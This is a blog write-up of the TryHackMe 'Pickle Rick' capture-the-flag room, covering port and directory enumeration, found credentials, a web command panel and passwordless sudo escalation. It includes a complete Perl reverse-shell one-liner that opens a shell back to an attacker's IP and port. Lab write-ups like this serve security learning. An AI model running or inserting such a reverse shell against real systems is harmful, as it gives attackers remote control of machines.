Pickle Rick CTF -Writeup-TryHackMe

Arnold Prakash
June 22, 2021 Posted by 11.7k Views

A Rick and Morty CTF. Help turn Rick back into a human! Link to room is here

This is Rick and Morty themed challenge,we are Morty in this challenge. We have to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.Let’s use our hacking super power and hack the web server and save Rick.

Launch the box and let’s enumerate the IP given.

Use: nmap -sC -sV -A machine IP

  • nmap is network mapper tool
  • -sC -> default script scanning
  • -sV -> version detection

We can see that the ports 22 and 80 are open.Port 22 is for SSH(secure shell ) and port 80 for HTTP. Lets go to the the browser and paste the IP there and check what is waiting for us.

Let’s spend some time to enumerate this website.Let’s view the source code in that time.

A user name is found here. let’s do directory enumeration and check other directories also.

Use: gobuster dir -u machine_ip -w wordlist_path

  • gobuster -> tool
  • dir-> directory enumeration mode
  • -w ->specify wordlist path

The results says there are many directories.Let’s open one by one.( I forgot to take screenshot)

  • /login.php
  • /robots.txt
  • /assests

Here I think we got a password.Let’s try the password and user name that we have in our hand now.

I viewed the source code of this logged in page and found something interesting.

I guess we have a base64 encrypted password. Let’s go to CyberChef to crack it.

I had to do the decryption almost 9 times to understand it was a rabbit hole,But that’s Ok. Keep moving forward we need to save Rick.

Let’s check the logged in page.

Wait that’s strange! why is it showing a command panel here? Let’s execute some basic commands ans see.

This page has command execution vulnerability, Let’s try some more commands.

Seems like our commands are sanitized.Which means our code will not be executed it will be just evaporate before it reaches the server.

Got another idea. We shall take a reverse shell from here.I used a Perl reverse shell code.

use:perl -e ‘use Socket;$i=”IP”;$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Listen to the port set.

Execute the command in the website and get the shell as shown below.

Now let’s execute some codes in the /var/www/html directory.

Now let’s move around through the server and find other two more secret ingredients.Let’s go to the /home directory and search.

We are one step away from saving Rick.

Use: sudo -l

We found something very interesting that we can run everything in sudo without a password.

Time for privilege escalation.

use: sudo su

We finally saved Rick.

Summary

  1. Basic enumeration done- port 22,port 80 open.
  2. We did directory enumeration on website.
  3. Website had command execution vulnerability.
  4. We took a reverse shell using perl code.
  5. We could switch user without password.
  6. We did sudo su to switch user and captured flags.

Thank you, peace out ✌️.

connect me on Twitter,Medium,Linkedin

Arnold Prakash
Arnold Prakash
View More Posts
I'm a degree student following my passion in the field of cyber security.